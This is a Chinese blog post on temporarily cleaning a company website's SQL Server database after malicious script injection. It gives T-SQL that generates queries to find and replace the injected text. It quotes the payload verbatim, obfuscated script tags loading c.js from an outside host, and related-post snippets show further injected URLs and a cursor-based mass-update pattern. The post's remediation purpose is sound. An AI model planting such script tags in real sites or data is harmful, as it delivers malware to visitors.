公司网站数据库挂马临时处理

最新推荐文章于 2024-05-15 22:52:13 发布
最新推荐文章于 2024-05-15 22:52:13 发布
阅读量1.5k 收藏
点赞数
文章标签: 数据库 join 脚本 c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/claro/article/details/3876678
版权

/*
恶意代码:<script src=http://3bomb.c%6Fm/c.js></script><script src=http://%33bomb.com/c.js></script><script src=http://%33bomb.com/c.js></script>
数据被加入恶意代码:加货<script src=http://3bomb.c%6Fm/c.js></script><script src=http://%33bomb.com/c.js></script><script src=http://%33bomb.com/c.js></script>
*/
--生成查询恶意代码的语句
SELECT N'select * from '+QUOTENAME(o.name)
    +N' where  '+ QUOTENAME(c.name)+ N' like '  + '''%<script%'''
from sysobjects o
join syscolumns c on o.id=c.id AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
join systypes t on c.xusertype=t.xusertype
where t.name='varchar'


--生成替换恶意代码的脚本1
SELECT N'update '+QUOTENAME(o.name)
    +N' set  '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script src=http://3bomb.c%6Fm/c.js></script>'','''')'
from sysobjects o
join syscolumns c on o.id=c.id AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
join systypes t on c.xusertype=t.xusertype
where t.name='varchar'

--生成替换恶意代码的脚本2
SELECT N'update '+QUOTENAME(o.name)
    +N' set  '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script src=http://3bomb.c%6Fm/c.js></script><script src=http://%33bomb.com/c.js></script><script src=http://%33bomb.com/c.js></script>'','''')'
from sysobjects o
join syscolumns c on o.id=c.id AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
join systypes t on c.xusertype=t.xusertype
where t.name='varchar'

claro
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
数据库挂马修复语句.txt
07-18
数据库挂马修复语句
数据库挂马
Air的博客
07-28 388
 SQL语句如下:数据库挂马用游标遍历所有表里如下数据类型的字段,然后Update挂马。(全部是允许写入字符的字段)xtype=99 ntextxtype=35 textxtype=231 nvarcharxtype=167 varchar———————YD的分割——————————–DECLARE @T varchar(255),@C varchar(255)DECLARE Table_Curs
清除数据库mssql挂马方法
fenghlc的专栏
10-20 453
<br />--清除数据库挂马的小方法,对于简单的挂马可以清除成功<br /> --使用update 方法用replace()函数替换一些木马脚本<br /> --使用方法 update 表名 set 字段名=replace(字段名, '木马脚本','')<br /> --这种方法有点替换的用法,下面是一个例子<br /><br /> update pimg set src=replace(src,'<script src=http://www.banner82.com/b.js></script>
比较流行的数据库挂马
04-30 917
google_ad_client="pub-6065469188450680";google_ad_width=728;google_ad_height=90;google_ad_format="728x90_as";google_ad_type="text_image";google_ad_channel="6872543818";2007-01-10 15:00
数据库挂马修复
Coisini的博客
05-26 152
declare @t varchar(255),@c varchar(255) dEcLaRe table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.iD=b.iD AnD a.xTyPe=‘u’ AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231...
数据库挂马处理方法
huike008的博客
03-15 246
数据库挂马我相信很多人都碰到过。在这里,讲下处理的方法。 第一步:为现有数据库做好备份。 第二步: 执行如下ASP文件,这样就可以去掉数据库当中的JS木马: 注:conn.asp自己去写了。 复制内容到剪贴板代码: '这里放入JS木马内容:请记得改为自己数据库中的JS木马内容。"&rstSchema("TABLE_NAME") & ":" '显示表名 S...
讲解SQL Server数据库挂马的解决方案
08-04
一个网站遭遇入侵,破坏相当严重,SQL数据库挂马,所有的表里面大部分字段都被多次重复插入挂马代码,查看日志,还好没有涉及到服务器的安全,只是数据库那里出现了很多异常警告而已,网站确实存在漏洞。...
BBSXP数据库挂马的操作.docx
09-26
BBSXP数据库挂马的操作.docx
数据库中的内容字段被挂马的替换方法 SQL注入
09-11
有时候有些数据库挂马了,如果是sqlserver数据库,就可以用下面的方法,不过,这样的方法比较适合懂sqlserver的朋友,不过不懂的朋友也可以用,一些数据库的在线管理程序替换。
ASP.Net网站数据库挂马后手动清除一例
03-16
NULL 博文链接:https://sivyer.iteye.com/blog/440174
实战数据库木马
lyfclear的专栏
05-27 1894
网站数据库里被放入一些不该有的内容一个字段后面被统一的加入了一些代码">从网上查了资料,写的也可以就用了,其中出了一些问题在此写下来.先来到这个数据库下use  XXX 换到XXX数据库下安全期间先对表做备份select * into BB  from AA where 1insert into  BB(X,Y,Z) select X,Y, Z  from  AA完成
linux mysql 挂马_解决数据库挂马最快方法
weixin_36372014的博客
02-01 285
如果你的数据库中被写入了 类似的木马,您可以采用这个方法快速的删除木马!新建存储过程,然后允许就可以了Create PROCEDURE dbo.ss ASdeclare @t varchar(555),@c varchar(555) ,@inScript varchar(8000)set @inScript=''declare table_cursor cursor for select a.na...
mysql挂马_虚拟主机/数据库挂马清理方法
weixin_39977136的博客
01-28 278
浏览器输入域名打开网页后,点击空白处,鼠标右键,查看源码/查看源文件;若程序禁止了鼠标右键,点击浏览器上的工具-查看源码(ie浏览器-页面-查看源码)查看源码底部有如下截图的链接或者进入业务管理-虚拟主机管理-管理-文件管理,点击wwwroot进入,找到您的首页,如index.html,index.php,default.asp,home.html等,双击首页文件打开删除截图中的一段代码,并保存修...
清理数据库挂马代码
Catvi's 博客,自家用
06-17 554
update 表名 set 字段名=replace(字段名,,)
为什么Redis6.0引入了多线程
IT深耕十余载,大道之简
05-11 531
总的来说,Redis 6.0引入多线程是为了提高性能、降低延迟、更好地利用CPU资源,并保持Redis的简单性和高性能特点。这些改进有助于Redis更好地应对不断增长的数据量和并发量需求,同时保持其稳定性和可靠性。Redis 6.0引入多线程的决策是基于其性能优化和适应现代硬件架构的考虑。
实战项目技术点(1)
最新发布
qq_60396437的博客
05-15 1084
分页插件PageHelper 是 Mybatis 的一款功能强大、方便易用的分页插件,支持任何形式的单标、多表的分页查询。官网:https://pagehelper.github.io/。文件上传,是指将本地图片、视频、音频等文件上传到服务器,供其他用户浏览或下载的过程。
简述redis数据类型及应用场景
qq_45927587的博客
05-10 358
每种数据类型的选择应当基于具体的应用需求,比如是否需要排序、是否允许重复元素、是否需要执行集合运算等。Redis作为一种高性能的内存数据存储系统,提供了多种数据结构来满足不同场景下的需求。: 双向链表,可以做栈(LPOP/RPOP)、队列(LPUSH/RPOP)或实现发布/订阅模式。: 最基本的数据类型,可以存储字符串、整数或者浮点数等数据。支持原子性操作,如增、删、改、查。: 无序且不重复的字符串集合,支持集合运算如并集、交集、差集。: 用于存储键值对的集合,每个哈希可以存储多个字段-值对。
mybatis 跨库查询 mysql
zzhongcy的专栏
05-11 419
跨库,表关联的查询,实现起来很简单:selecta.uidfrom只要在表的前边加上库名即可。
MySql软件安装
m0_62731842的博客
05-12 424
1.打开mysql官网网址 MySQL :: Download MySQL Community Server 2.本次针对版本8的图形化界面安装,下载成功后接下来对MySQL进行安装 3.图形化下载后有一个MSI文件 4.我们安装典型即可,选择第一个 5.选择数据库信息存放的路径,我默认放在C盘不做改变 6.MySQL平时作为一些应用的数据提供者,选择服务类型即可 7.端口号(暴露的端口号便于我们连接数据库,进行相关数据操作)可以修改,但我们平常使用的端口号是33
怎么看网站挂马的工具
03-31
作为AI,我无法提供具体的工具,但是以下是一些检测网站是否被挂马的方法: 1. 使用杀毒软件扫描:使用一款可靠的杀毒软件,对网站进行全面...如果怀疑网站挂马,应该尽快联系网站管理员或专业的安全团队进行处理

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值